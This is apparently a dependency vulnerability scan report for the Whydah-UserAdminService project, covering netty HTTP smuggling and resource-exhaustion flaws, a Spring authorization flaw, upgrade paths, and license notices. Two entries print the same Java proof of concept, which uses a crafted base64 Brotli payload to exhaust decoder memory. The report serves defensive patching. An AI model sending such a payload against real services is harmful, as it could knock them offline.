Vulnerabilities: 5 via 27 paths
Dependencies: 139
Source: GitHub
Commit: 670a4176

high severity
new

HTTP Request Smuggling

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: com.azure:azure-identity@1.17.0

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to HTTP Request Smuggling via the parsing of chunk extensions in HTTP/1.1 messages with chunked encoding. An attacker can bypass HTTP request boundaries by sending specially crafted HTTP requests that exploit differences in how standalone newline characters are parsed between reverse proxies and the backend, potentially allowing them to smuggle additional requests.

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.125.Final, 4.2.5.Final or higher.

high severity
new

Improper Handling of Highly Compressed Data (Data Amplification)

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: com.azure:azure-identity@1.17.0

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the BrotliDecoder.decompress function, which has no limit on how often it calls pull, decompressing data 64K bytes at a time. An attacker can exhaust system memory and cause application downtime by submitting specially crafted compressed input that triggers excessive buffer allocations.

PoC

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.compression.BrotliDecoder;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIA
aPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.125.Final or higher.

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: io.netty:netty-codec-http2
  • Introduced through: com.azure:azure-identity@1.17.0

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final

Overview

io.netty:netty-codec-http2 is an HTTP/2 subpackage of the netty library, an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the improper handling of concurrently active streams per connection. An attacker can cause resource exhaustion and disrupt service availability by rapidly sending crafted frames, such as WINDOW_UPDATE, HEADERS, or PRIORITY, that manipulate the server's stream reset logic, leading to unbounded concurrent stream processing.

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.124.Final, 4.2.4.Final or higher.

high severity
new

Improper Handling of Highly Compressed Data (Data Amplification)

  • Vulnerable module: io.netty:netty-codec-http2
  • Introduced through: com.azure:azure-identity@1.17.0

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final

Overview

io.netty:netty-codec-http2 is an HTTP/2 subpackage of the netty library, an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the BrotliDecoder.decompress function, which has no limit on how often it calls pull, decompressing data 64K bytes at a time. An attacker can exhaust system memory and cause application downtime by submitting specially crafted compressed input that triggers excessive buffer allocations.

PoC

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.compression.BrotliDecoder;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIA
aPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.125.Final or higher.

high severity
new

Incorrect Authorization

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework:spring-core@6.2.10, org.springframework:spring-beans@6.2.10 and others

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-core@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-beans@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-aop@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-aop@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-web@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-web@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-aop@6.2.10 org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-aop@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-web@6.2.10 org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-web@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-aop@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-expression@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-aop@6.2.10 org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Incorrect Authorization via the AnnotationsScanner and AnnotatedMethod classes. An attacker can gain unauthorized access to sensitive information by exploiting improper resolution of annotations on methods within type hierarchies that use parameterized supertypes with unbounded generics.

Note: This is only exploitable if security annotations are used on methods in generic superclasses or generic interfaces and the @EnableMethodSecurity feature is enabled.

Remediation

Upgrade org.springframework:spring-core to version 6.2.11 or higher.

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-classic
  • Introduced through: ch.qos.logback:logback-classic@1.5.18

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d ch.qos.logback:logback-classic@1.5.18

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-core
  • Introduced through: ch.qos.logback:logback-classic@1.5.18

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18

medium severity

LGPL-3.0 license

  • Module: org.jboss.logging:jboss-logging-processor
  • Introduced through: org.jboss.weld.se:weld-se-core@5.1.5.Final

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.jboss.weld.se:weld-se-core@5.1.5.Final org.jboss.weld:weld-lite-extension-translator@5.1.5.Final org.jboss.logging:jboss-logging-processor@2.2.1.Final
